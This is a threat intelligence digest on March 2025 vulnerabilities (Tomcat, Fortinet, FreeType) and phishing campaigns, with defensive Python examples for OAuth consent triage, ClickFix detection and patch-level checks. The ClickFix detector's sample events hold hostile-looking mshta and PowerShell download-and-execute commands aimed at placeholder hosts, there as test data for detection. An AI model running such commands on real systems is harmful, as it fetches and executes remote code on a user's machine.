Executive Summary
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Threat Actors Actively Exploiting Remote Code Execution Vulnerability CVE-2025-24813 - Threat actors are actively exploiting a remote code execution (RCE) vulnerability in Apache Tomcat versions 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0-M1 to 9.0.98, tracked as CVE-2025-24813. The proof-of-concept (PoC) exploit, released on GitHub on March 13, 2025, abuses Tomcat’s file-based session persistence (in its default storage location) together with Tomcat’s support for partial PUT requests. Exploitation requires a non-default configuration: writes must be enabled on the default servlet (the readonly initialisation parameter set to false), file-based session persistence must be in use, and a deserialisation gadget library must be on the application's classpath. Instances that keep the default servlet read-only are not exposed to the RCE path, but should still be patched.
Mora_001 Campaign Exploits Two Fortinet Vulnerabilities (CVE-2024-55591 and CVE-2025-24472) - On March 12, 2025, cybersecurity firm Forescout published a write-up detailing a new ransomware campaign by a threat actor named "Mora_001”. The campaign exploits FortiGate firewall appliances using two Fortinet vulnerabilities (CVE-2024-55591 and CVE-2025-24472) to gain unauthorised access and deliver a new ransomware called "SuperBlack".
Meta Warns of FreeType Vulnerability (CVE-2025-27363) - On March 13, 2025, Meta reported that threat actors may have been actively exploiting CVE-2025-27363, a high-severity out-of-bounds write vulnerability affecting FreeType versions 2.13.0 and earlier. FreeType is an open-source font rendering library embedded in many platforms and engines, including Linux, Android, Tizen, Roku, iOS, ChromeOS, ReactOS, Ghostscript, Chromium, WebKit, Gecko, and Goanna, so a single vulnerable copy can be present in several products on one host.
Potential Threats
Phishing Campaign Uses OAuth App to Target 12,000 GitHub Repositories - On March 16, 2025, BleepingComputer reported an ongoing phishing campaign in which unidentified threat actors have already targeted approximately 12,000 GitHub repositories. First identified by cybersecurity researcher Luc4m, the attack impersonates GitHub security alerts to trick developers into authorising a malicious OAuth app, ‘gitsecurityapp.’ The app allows threat actors full control over repositories, user profiles, and GitHub Actions workflows if granted access.
Threat Actors Distribute Counterfeit Adobe and DocuSign OAuth Applications to Steal Microsoft 365 Credentials - On March 13, 2025, Proofpoint identified two phishing campaigns that used malicious OAuth apps to take over Microsoft 365 accounts and spread malware. The threat actors exploited compromised accounts of charities and small businesses to send phishing emails.
Phishing Campaign Impersonating Booking.com and Targeting Hospitality Industry Using Social Engineering - On March 13, 2025, Microsoft reported an ongoing phishing campaign by the Storm-1865 threat group, active since at least December 2024. The campaign targets hospitality organisations across North America, Oceania, Europe, and Southeast Asia, aiming to steal financial data and account credentials through "ClickFix" social engineering attack and malware deployment.
General News
Google buys cloud security provider Wiz for $32 billion - Google is acquiring cloud security company Wiz for $32 billion — the biggest such deal in the tech giant’s history and also the largest corporate acquisition overall this year.
CISA: More than 300 critical infrastructure organisations attacked by Medusa ransomware - An advisory on Wednesday said the group and its affiliates had attacked organisations in the medical, education, legal, insurance, technology and manufacturing industries.
GitHub restores code following malicious changes to tj-actions tool - On Friday, March 14, 2025, cybersecurity firm StepSecurity warned of a security incident impacting the tj-actions/changed-files GitHub Action, a popular tool used to track file changes and trigger other actions depending on those alterations. The tool has more than 1 million monthly downloads. The compromised versions exposed CI/CD secrets in workflow logs, so any repository that ran the action during the incident window should treat secrets available to those workflows as exposed and rotate them.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

Threat Actor | Severity Change | Opportunity Change | Intent Change
---|---|---|---
Crazy Hunter Ransomware Group | New → Basic | (30) ↑ 30 | (35) ↑ 35
NightSpire Ransomware Group | New → Basic | (25) ↑ 25 | (31) ↑ 31
Orca Ransomware Group | New → Basic | (25) ↑ 25 | (30) ↑ 30
Storm-1865 | New → Basic | (30) ↑ 30 | (25) ↑ 25
dashoar | New → Basic | (30) ↑ 30 | (25) ↑ 25
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is marked with a small symbol indicating how actively it is trending.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲ - Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲ - Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
Attackers | Trend | Methods | Trend | Vulnerabilities | Trend | Targets | Trend
---|---|---|---|---|---|---|---
Hellcat Ransomware Group | ▲ | AsyncRAT | ▲ | CVE-2025-24813 | ▲ | Fast Retailing Co. | ▲
Israel | ▲ | Account Takeover | ▲ | CVE-2024-27564 | ▲ | APA Corporation | ▲
Iran | ▲ | TA0001 (Initial Access) | ▲ | CVE-2025-24071 | ▲ | Israel Defense Forces | ▲
TAG-94 (MirrorFace) | ▲ | REMCOS RAT | ▲ | CVE-2025-29891 | ▲ | Apache Corporation | ▲
DieNet | ▲ | Remote Access Trojan (RAT) | ▲ | CVE-2024-36904 | ▲ | Biotechnology | ▲
Prominent Information Security Events
Threat Actors Distribute Counterfeit Adobe and DocuSign OAuth Applications to Steal Microsoft 365 Credentials.
Source: Insikt Group, Proofpoint | Validated Intelligence Event
Intelligence Cards: Intelligence & Reports
IOC: Hash/MD5 - 85da47ec297740abaf03f3d45aaab169
IOC: URL - hxxps://li[.]tistateronic[.]ru/OqgX
IOC: URL - hxxps://line[.]infoapollocapital[.]buzz
IOC: URL - hxxps://fancy-bush-61e9sydgsyi29s[.]jennifer-may.workers[.]dev
On March 13, 2025, Proofpoint identified two phishing campaigns that used malicious OAuth apps to take over Microsoft 365 accounts and spread malware. The threat actors exploited compromised accounts of charities and small businesses to send phishing emails.
The emails targeted employees at government, healthcare, logistics, and retail organisations, primarily in the United States and Europe. The victims were deceived into providing access to malicious OAuth apps that purported to be Adobe Drive, Adobe Acrobat, and DocuSign.
The malicious apps requested only minimal permissions, such as reading profile data, email address, and account ID, so that the consent prompt would not look alarming and the grant would not trip alerting that keys on high-privilege scopes. Once authorised, the victims were redirected to sites hosting Microsoft 365 credential-stealing phishing pages or malware. While Proofpoint could not verify which malware was used, they observed the threat actors using the ClickFix social engineering method to coax the victim into interacting. Because the scopes granted are low-risk, the consent itself is the detection opportunity: hunt for consent grants to apps whose display name mimics a well-known vendor but whose publisher is unverified.
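The hunting approach described above, as an added example that is not Proofpoint's tooling or part of the original report: it scans consent-grant records already exported from a Microsoft 365 tenant for look-alike vendor names from unverified publishers and for unverified apps that asked only for the low-noise identity scopes. The record layout is an assumed, simplified join of Microsoft Graph servicePrincipal and oauth2PermissionGrant fields, the scope names are the standard Graph OpenID Connect scopes, and the sample rows are constructed, not real tenant data.

```python
"""Triage Microsoft 365 OAuth consent grants for look-alike apps.

Added example; not vendor tooling. Assumes records have already been
exported from Microsoft Graph and flattened into the shape below.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Vendors the campaign impersonated, per the report.
IMPERSONATED_VENDORS = ("adobe", "docusign")

# Low-noise delegated scopes (profile, email, account id). The exact scope
# names are an assumption based on Microsoft Graph's standard OIDC scopes.
LOW_NOISE_SCOPES = {"openid", "profile", "email", "User.Read"}


@dataclass
class ConsentGrant:
    app_display_name: str
    app_id: str
    verified_publisher: Optional[str]   # None when no verified publisher
    scopes: Set[str]
    consent_type: str                   # "Principal" = user consent, "AllPrincipals" = admin
    granted_by: str


def impersonated_vendor(name: str) -> Optional[str]:
    """Return the vendor a display name mimics, if any."""
    lowered = name.lower()
    for vendor in IMPERSONATED_VENDORS:
        if vendor in lowered:
            return vendor
    return None


def grant_findings(grant: ConsentGrant) -> List[str]:
    """Reasons a grant deserves analyst review (empty list = nothing notable)."""
    reasons: List[str] = []
    vendor = impersonated_vendor(grant.app_display_name)
    publisher = (grant.verified_publisher or "").lower()

    if vendor and not publisher:
        reasons.append(f"name mimics {vendor} but publisher is unverified")
    elif vendor and vendor not in publisher:
        reasons.append(f"name mimics {vendor} but verified publisher is {grant.verified_publisher}")

    # The campaign's trick: ask for so little that scope-based alerting stays quiet.
    if (not publisher and grant.consent_type == "Principal"
            and grant.scopes and grant.scopes <= LOW_NOISE_SCOPES):
        reasons.append("user consented to unverified app requesting only identity scopes")
    return reasons


def suspicious_grants(grants: List[ConsentGrant]) -> Dict[str, List[str]]:
    """Map app_id -> findings for every grant with at least one finding."""
    result: Dict[str, List[str]] = {}
    for g in grants:
        findings = grant_findings(g)
        if findings:
            result[g.app_id] = findings
    return result


# Constructed sample export (not real tenant data).
SAMPLE_GRANTS = [
    ConsentGrant("Adobe Drive", "app-0001", None,
                 {"openid", "profile", "email", "User.Read"}, "Principal", "alice@example.invalid"),
    ConsentGrant("DocuSign", "app-0002", "Docusign, Inc.",
                 {"openid", "profile", "email"}, "AllPrincipals", "admin@example.invalid"),
    ConsentGrant("Adobe Acrobat", "app-0003", "Totally Legit Apps LLC",
                 {"User.Read"}, "Principal", "bob@example.invalid"),
    ConsentGrant("Contoso Expense Reports", "app-0004", None,
                 {"Mail.ReadWrite", "Files.ReadWrite"}, "Principal", "carol@example.invalid"),
]

if __name__ == "__main__":
    for app_id, reasons in suspicious_grants(SAMPLE_GRANTS).items():
        print(app_id, "->", "; ".join(reasons))
```

The high-privilege Contoso grant is deliberately left out of the findings: it may well deserve its own review, but this pass targets the pattern in the report, where the dangerous grants are the quiet ones. Run the same logic against a live export to produce a revocation list for the tenant's admin.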
Storm-1865 Phishing Campaign Impersonating Booking.com and Targeting Hospitality Industry Using Social Engineering Technique ClickFix to Deliver Malware.
Source: Insikt Group, Microsoft | Validated Intelligence Event
Intelligence Cards: Intelligence & Reports
IOC: Hash/SHA256 - f87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981e
IOC: Hash/SHA256 - 01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6
IOC: IP - 147.45.44[.]131
IOC: IP - 87.121.221[.]124
On March 13, 2025, Microsoft reported an ongoing phishing campaign by the Storm-1865 threat group, active since at least December 2024. The campaign targets hospitality organisations across North America, Oceania, Europe, and Southeast Asia, aiming to steal financial data and account credentials through "ClickFix" social engineering attacks and malware deployment.
Storm-1865’s attack chain begins with phishing emails impersonating Booking.com, referencing negative guest reviews, reservation inquiries, or account verification requests. These emails contain either PDF attachments or embedded links directing recipients to a fraudulent CAPTCHA page. Using the ClickFix technique, the phishing site displays a CAPTCHA that appears to require verification but instead copies a hidden mshta.exe command to the Windows clipboard. It then instructs victims to open the Windows Run dialog, paste the clipboard contents, and execute the command, unknowingly deploying malware.
The ClickFix technique is a widely used method for malware distribution and is not exclusive to Storm-1865. Russian and Iranian state-sponsored threat actors, including APT28 and MuddyWater, have also used this approach. ClickFix exploits user interaction by presenting a seemingly legitimate solution to a perceived issue, leading victims to unknowingly execute malicious commands.
Unlike traditional malware distribution methods, this technique does not rely on an exploit or on a script that executes automatically; the victim types or pastes the command and runs it themselves, which sidesteps controls that only inspect attachments and downloads. The detection opportunity is on the endpoint: a script host such as mshta.exe spawned from the Run dialog with a remote URL on its command line is rarely legitimate.
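The endpoint detection logic described above, as an added example rather than Microsoft's own detection or anything from the Storm-1865 report: it flags process-creation events where mshta.exe (the binary this campaign uses) is launched with a remote URL argument from explorer.exe, which is the parent of anything started through the Win+R Run dialog. The event layout is a simplified Sysmon Event ID 1 record, the events themselves are constructed, and treating powershell.exe as a second ClickFix script host is an assumption beyond what this page describes.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example, not vendor detection content. Events are simplified
Sysmon Event ID 1 records (Image, ParentImage, CommandLine, User).
"""
import re
from typing import Dict, List

# mshta.exe is the host named in the report; powershell.exe is an assumed
# variant seen in other ClickFix lures.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe"}

# Run dialog launches are children of explorer.exe (assumption: default shell).
RUN_DIALOG_PARENT = "explorer.exe"

# Remote content on the command line: http(s)/ftp URL or a UNC path.
REMOTE_ARG = re.compile(r"(?:https?|ftp)://\S+|\\\\[\w.-]+\\\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerating either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_candidate(event: Dict[str, str]) -> bool:
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image not in SCRIPT_HOSTS:
        return False
    if parent != RUN_DIALOG_PARENT:
        # A browser or Office parent is a different (still interesting) chain.
        return False
    return REMOTE_ARG.search(cmd) is not None


def detect(events: List[Dict[str, str]]) -> List[str]:
    """Return 'user: command line' for every candidate, in input order."""
    return [f"{e.get('User', '?')}: {e.get('CommandLine', '')}"
            for e in events if is_clickfix_candidate(e)]


# Constructed sample telemetry (not real Sysmon output).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://verify.example.invalid/captcha.hta", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Tools\inventory.hta", "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": "mshta https://verify.example.invalid/doc.hta", "User": r"CORP\carol"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iwr https://cdn.example.invalid/x.ps1 | iex\"",
     "User": r"CORP\dave"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad https://notes.example.invalid", "User": r"CORP\erin"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ClickFix candidate:", hit)
```

The Word-spawned mshta event is intentionally not matched here; it belongs to a separate maldoc rule. In production, pair this with the clipboard-write step (a browser page writing to the clipboard just before the Run dialog opens) to raise confidence.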
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-24813 – To prevent threat actors from exploiting CVE-2025-24813, we recommend updating Apache Tomcat to the fixed versions listed below:
- Apache Tomcat version 11.0.3 or later
- Apache Tomcat version 10.1.35 or later
- Apache Tomcat version 9.0.99 or later
- CVE-2024-55591 – Users should upgrade to FortiOS version 7.0.17 or later, and FortiProxy version 7.0.20 or 7.2.13 or later.
- CVE-2025-24472 – Users should upgrade to FortiOS version 7.0.17 or later, and FortiProxy version 7.0.20 or 7.2.13 or later. Both Fortinet issues are addressed by the same fixed releases; where upgrading is delayed, restricting administrative interface access to trusted networks reduces exposure.
- CVE-2025-27363 – Users are recommended to update to the latest version of FreeType (2.13.3). Because FreeType is bundled into many of the platforms listed above, check each product's own updates rather than only the system library.
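A version check that an operator could run against an inventory, added here as an example and not vendor tooling. The Tomcat affected ranges and fixed versions are the ones stated in this digest; the one subtlety it handles is that Tomcat milestone builds (for example 11.0.0-M1) sort before the GA release of the same number, so a naive dotted-number comparison misclassifies them. Branches the digest does not list (such as Tomcat 8.5) are reported as "not listed" rather than guessed. The plain minimum-version helper covers the FortiOS and FreeType floors from the list above; the inventory entries at the bottom are constructed.

```python
"""Classify installed versions against the fixes listed in this digest.

Added example; affected ranges and fixed versions are those stated above.
"""
import re
from typing import List, Optional, Tuple

_TOMCAT_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?$")

# (first affected, last affected, fixed) per this digest, for CVE-2025-24813.
TOMCAT_CVE_2025_24813 = [
    ("11.0.0-M1", "11.0.2", "11.0.3"),
    ("10.1.0-M1", "10.1.34", "10.1.35"),
    ("9.0.0-M1", "9.0.98", "9.0.99"),
]


def parse_tomcat(version: str) -> Tuple[int, int, int, int, int]:
    """Sortable key; milestones rank below the GA build of the same number."""
    m = _TOMCAT_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    major, minor, patch, milestone = m.groups()
    if milestone is None:
        return (int(major), int(minor), int(patch), 1, 0)   # GA
    return (int(major), int(minor), int(patch), 0, int(milestone))


def tomcat_status(version: str) -> Tuple[str, Optional[str]]:
    """('affected'|'fixed'|'not listed', fixed version or None)."""
    v = parse_tomcat(version)
    for first, last, fixed in TOMCAT_CVE_2025_24813:
        branch = parse_tomcat(fixed)[:2]
        if v[:2] != branch:
            continue
        if parse_tomcat(first) <= v <= parse_tomcat(last):
            return ("affected", fixed)
        if v >= parse_tomcat(fixed):
            return ("fixed", fixed)
    return ("not listed", None)


def at_or_above(installed: str, minimum: str) -> bool:
    """Plain dotted-number comparison for FortiOS / FreeType style versions."""
    def key(s: str) -> List[int]:
        return [int(p) for p in s.strip().split(".")]
    return key(installed) >= key(minimum)


# Minimum fixed versions from the remediation list above.
MINIMUMS = {"fortios": "7.0.17", "freetype": "2.13.3"}


def review(inventory: List[Tuple[str, str, str]]) -> List[str]:
    """Return one line per host that still needs action."""
    todo = []
    for host, product, version in inventory:
        if product == "tomcat":
            status, fixed = tomcat_status(version)
            if status == "affected":
                todo.append(f"{host}: Tomcat {version} affected, upgrade to {fixed}")
        elif product in MINIMUMS and not at_or_above(version, MINIMUMS[product]):
            todo.append(f"{host}: {product} {version} below {MINIMUMS[product]}")
    return todo


# Constructed inventory (hostnames and versions are illustrative only).
SAMPLE_INVENTORY = [
    ("web-01", "tomcat", "9.0.98"),
    ("web-02", "tomcat", "11.0.0-M26"),
    ("web-03", "tomcat", "10.1.35"),
    ("web-04", "tomcat", "8.5.100"),
    ("fw-01", "fortios", "7.0.16"),
    ("build-01", "freetype", "2.13.3"),
]

if __name__ == "__main__":
    for line in review(SAMPLE_INVENTORY):
        print(line)
```

Tomcat 8.5.100 is deliberately reported as "not listed": the digest gives no range for that branch, and a tool should say so rather than silently mark it safe.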
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.